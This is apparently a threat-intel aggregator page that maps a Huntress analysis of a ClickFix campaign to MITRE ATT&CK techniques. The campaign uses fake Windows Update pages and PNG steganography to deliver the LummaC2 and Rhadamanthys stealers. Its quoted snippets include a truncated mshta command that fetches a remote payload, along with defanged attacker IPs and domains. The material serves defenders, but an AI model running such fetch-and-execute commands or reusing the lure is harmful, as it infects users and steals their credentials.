TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

ClickFix Gets Creative: Malware Buried in Images

2025-11-24 · Read original ↗

ATT&CK techniques detected

23 predictions
T1055.001Dynamic-link Library Injection
97%
“the baseindex - these are decrypted by xoring 114 with ( 255 - red ) figure 23 : snippet of deobfuscated stego algorithm - each row of pixels might be padded on 4 - byte boundaries for performance. stride is the total number of bytes per row, in memory ( including an additional p…”
T1055.001Dynamic-link Library Injection
95%
“decrypt the hardcoded strings and leverage find & replace operations to rename class, function and variable names. after doing so, we can see the actual entry point function, wvr [ … redacted … ] nmu. ojo [ … redacted … ] sgy ( ), runs the below : figure 16 : deobfuscated “ real …”
T1204.004Malicious Copy and Paste
95%
“update splash page in full - screen, displaying realistic “ working on updates ” animations that eventually conclude by prompting the user to follow the standard clickfix pattern : open the run prompt ( win + r ), then paste and run the malicious command. how it starts : the robo…”
T1059.001PowerShell
91%
“7 : blob url javascript copying the initial clickfix command to the clipboard figure 8 : diagram depicting the execution chain leading to lummac2 stage 1 : mshta. exe the initial command copied to the clipboard uses mshta. exe to execute a jscript payload : mshta hxxp : / / 81. 0…”
T1204.004Malicious Copy and Paste
89%
“clickfix gets creative : malware buried in images this analysis details a multi - stage malware execution chain, originating from a clickfix lure, that leads to the delivery of infostealing malware, including lummac2 and rhadamanthys. a notable discovery during analysis was the c…”
T1055.001Dynamic-link Library Injection
83%
“. sht [ … redacted … ] ixr ( ) is called. this function will then call, wvr [ … redacted … ] nmu. ojo [ … redacted … ] sgy ( ), which beings the actual malicious execution : figure 14 : dnspy output displaying the “ real ” entry point to the loader we can observe large variable a…”
T1620Reflective Code Loading
81%
“7 : blob url javascript copying the initial clickfix command to the clipboard figure 8 : diagram depicting the execution chain leading to lummac2 stage 1 : mshta. exe the initial command copied to the clipboard uses mshta. exe to execute a jscript payload : mshta hxxp : / / 81. 0…”
T1204.004Malicious Copy and Paste
72%
“hosted on xoiiasdpsdoasdpojas [. ] com, although both point to the same ip address 141 [. ] 98 [. ] 80 [. ] 175, which was also used to deliver the first stage! windows update source the source code of the windows update clickfix lure site is not obfuscated, contains comments in …”
T1055.001Dynamic-link Library Injection
68%
“decryption and. net assembly loading this code utilises bitwise xor operations to decrypt the assembly. this. net assembly is loaded, and the entry point is invoked to begin execution. stage 3 : stego loader assembly the 3rd - stage. net assembly acts as a loader for the 4th stag…”
T1027.003Steganography
64%
“manifest resource from this assembly. from the config, the resource name cd8302542f494f4d8fbcb2d21425b316 is provided. figure 18 : dnspy output displaying manifest resource the manifest resource cd8302542f494f4d8fbcb2d21425b316 is encrypted using aes. using the function cryptotyp…”
T1059.001PowerShell
64%
“##oiiasdpsdoasdpojas [. ] com ( 141. 98. 80 [. ] 175 ) - stage 3 ( stego loader ) - > … rhadamanthys stealer figure 31 : rhadamnthys stealer execution chain 2025 - 10 - 17 - report 5 - windows update clickfix domain : n / a - stage 1 ( mshta ) : hxxp : / / 141. 0x62. 80 [. ] 175 …”
T1204.004Malicious Copy and Paste
62%
“##ress has tracked a few clusters of clickfix activity associated with this windows update campaign. one of the clusters involves the ip address, 141. 98. 80 [. ] 175, which has been used to deliver the first - stage and 2nd stage payloads on huntress partners since october 1 : 2…”
T1204.001Malicious Link
60%
“clickfix gets creative : malware buried in images this analysis details a multi - stage malware execution chain, originating from a clickfix lure, that leads to the delivery of infostealing malware, including lummac2 and rhadamanthys. a notable discovery during analysis was the c…”
T1059.001PowerShell
55%
“##62. 80 [. ] 175 / gpsc. dat - stage 2 ( powershell ) : securitysettings [. ] live ( 141. 98. 80 [. ] 175 ) - stage 3 ( stego loader ) - > … rhadamanthys stealer 2025 - 10 - 13 - report 3 - windows update clickfix domain : n / a - stage 1 ( mshta ) : hxxp : / / 141. 0x62. 80 [. …”
T1055.001Dynamic-link Library Injection
55%
“cycle, with the browser entering full - screen mode and displaying a genuine - looking windows update screen. at the end of the “ update ”, users are encouraged to follow the regular win + r & ctrl + v pattern to paste a malicious command. in these cases, the same execution chain…”
T1055.012Process Hollowing
52%
“: snippet of deobfuscated c # code invoking process injection we can decrypt the source to reveal how process injection is performed : figure 25 : snippet of c # source that is compiled on execution the snippet above performs standard process injection, with the following aliases…”
T1055.012Process Hollowing
50%
“proceeding with cleanup operations ) - process - > terminateprocess ( terminates the target process after the payload has finished executing ) - handle - > closehandle ( releases handles to the process and thread objects ) stage 5 - donut shellcode the shellcode extracted using t…”
T1059.001PowerShell
50%
“cycle, with the browser entering full - screen mode and displaying a genuine - looking windows update screen. at the end of the “ update ”, users are encouraged to follow the regular win + r & ctrl + v pattern to paste a malicious command. in these cases, the same execution chain…”
T1204.004Malicious Copy and Paste
49%
“cycle, with the browser entering full - screen mode and displaying a genuine - looking windows update screen. at the end of the “ update ”, users are encouraged to follow the regular win + r & ctrl + v pattern to paste a malicious command. in these cases, the same execution chain…”
T1204.004Malicious Copy and Paste
41%
“##x websites hosting this lure : figure 35 : pivoting to identify additional windows update lure sites conclusion huntress observed two distinct variants of the clickfix lure during the investigation : a standard “ robot verification ” and a newer, more convincing “ windows updat…”
T1059.001PowerShell
37%
“##ress has tracked a few clusters of clickfix activity associated with this windows update campaign. one of the clusters involves the ip address, 141. 98. 80 [. ] 175, which has been used to deliver the first - stage and 2nd stage payloads on huntress partners since october 1 : 2…”
T1204.002Malicious File
36%
“src = bloburl - var head = document. head | | document. documentelement ; - head. insertbefore ( s, head. firstchild ) ; additionally, we can see that after the script is loaded, the temporary blob : url is revoked and removed : s. onload = function ( ) { try { url. revokeobjectu…”
T1055.001Dynamic-link Library Injection
31%
“proceeding with cleanup operations ) - process - > terminateprocess ( terminates the target process after the payload has finished executing ) - handle - > closehandle ( releases handles to the process and thread objects ) stage 5 - donut shellcode the shellcode extracted using t…”

Summary

Huntress uncovered an attack utilizing a ClickFix lure to initiate a multi-stage malware execution chain. This analysis reveals how threat actors use steganography to conceal infostealers like LummaC2 and Rhadamanthys within seemingly harmless PNGs.